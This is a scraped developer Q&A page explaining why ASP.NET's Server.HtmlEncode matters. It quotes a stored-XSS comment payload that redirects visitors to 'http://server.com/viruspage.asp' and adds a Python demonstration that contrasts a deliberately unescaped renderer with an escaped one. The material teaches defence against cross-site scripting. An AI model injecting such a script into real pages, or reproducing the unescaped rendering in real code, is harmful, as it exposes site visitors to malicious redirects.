
Why is Server.HtmlEncode required?

Developer https://www.devze.com 2023-03-23 04:44 Source: web
I am not able to understand why Server.HtmlEncode is required. MSDN states that it is used to encode potentially unsafe characters into their HTML-encoded equivalents.

Can someone give me some idea how these characters are unsafe and require us to use Server.HtmlEncode?

Thanks.


One example of how characters can be unsafe is if the user submits a comment on your page. If the comment form does not use HtmlEncode, then anything the user has just typed will now be visible as a comment on the page. In that case, a hacker could submit a comment like the following:

<script language="javascript" type="text/javascript">
window.location = 'http://server.com/viruspage.asp';
</script>

For each subsequent user who loads the page, the script will run (because it hasn't been encoded with HtmlEncode), redirecting each user to a page with viruses. This is a very simple example, but there are many other ways to input malicious data, potentially even giving hackers administrative access to your databases.

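The scenario in the answer above, as an added example that is not part of the original question or answer. It is written in Python rather than ASP.NET so that it runs stand-alone: html.escape() stands in for Server.HtmlEncode (it encodes the same characters: &, <, >, " and '), the page template and the comment-rendering functions are hypothetical, and the attacker's comment is the payload from the answer, embedded here as constructed sample input. Python's own HTMLParser is then used to approximate what a browser would build from each page, so you can see the difference between a page that executes the script and one that merely displays it.

```python
"""Added example (not from the original post): why Server.HtmlEncode matters.

html.escape() plays the role of Server.HtmlEncode.  The attacker's comment
is constructed sample input; PAGE_TEMPLATE and the render_* functions are
hypothetical stand-ins for a comment page.
"""
import html
from html.parser import HTMLParser

# Constructed sample input: the payload quoted in the answer above.
ATTACK_COMMENT = (
    '<script language="javascript" type="text/javascript">\n'
    "window.location = 'http://server.com/viruspage.asp';\n"
    "</script>"
)

# Hypothetical page: the comment body is dropped into a <div>.
PAGE_TEMPLATE = (
    '<html><body><h1>Comments</h1>'
    '<div class="comment">{body}</div></body></html>'
)


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the comment is interpolated into the page verbatim,
    so any markup the user typed becomes markup in the page."""
    return PAGE_TEMPLATE.format(body=comment)


def render_comment_safe(comment: str) -> str:
    """Fixed: every character with HTML meaning is encoded first
    (equivalent of Server.HtmlEncode), so the browser treats the
    comment as text rather than as tags."""
    return PAGE_TEMPLATE.format(body=html.escape(comment, quote=True))


class _PageInspector(HTMLParser):
    """Counts <script> elements and collects the text a browser would show,
    approximating the DOM a browser builds from the page."""

    def __init__(self) -> None:
        super().__init__()  # convert_charrefs=True: &lt; comes back as '<'
        self.script_tags = 0
        self.text_chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1

    def handle_data(self, data):
        self.text_chunks.append(data)


def script_elements_in(page: str) -> int:
    """Number of <script> elements a browser would execute on this page."""
    inspector = _PageInspector()
    inspector.feed(page)
    inspector.close()
    return inspector.script_tags


def visible_text_of(page: str) -> str:
    """Text content of the page after the browser decodes entities."""
    inspector = _PageInspector()
    inspector.feed(page)
    inspector.close()
    return "".join(inspector.text_chunks)


if __name__ == "__main__":
    unsafe_page = render_comment_unsafe(ATTACK_COMMENT)
    safe_page = render_comment_safe(ATTACK_COMMENT)
    print("unencoded page executes", script_elements_in(unsafe_page), "script element(s)")
    print("encoded page executes", script_elements_in(safe_page), "script element(s)")
    print("encoded page shows the payload as plain text:",
          ATTACK_COMMENT in visible_text_of(safe_page))
```

The unencoded page yields one executable script element; the encoded page yields none, and the attacker's text is shown to readers exactly as typed. One caveat a practitioner should keep in mind: HtmlEncode is the right encoder only for the HTML body and for quoted attribute values. Data that lands inside a JavaScript string, a URL, or an unquoted attribute needs an encoder for that context instead (in ASP.NET, for example, HttpUtility.JavaScriptStringEncode or Server.UrlEncode), because the characters that are dangerous there are not the ones HtmlEncode escapes.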
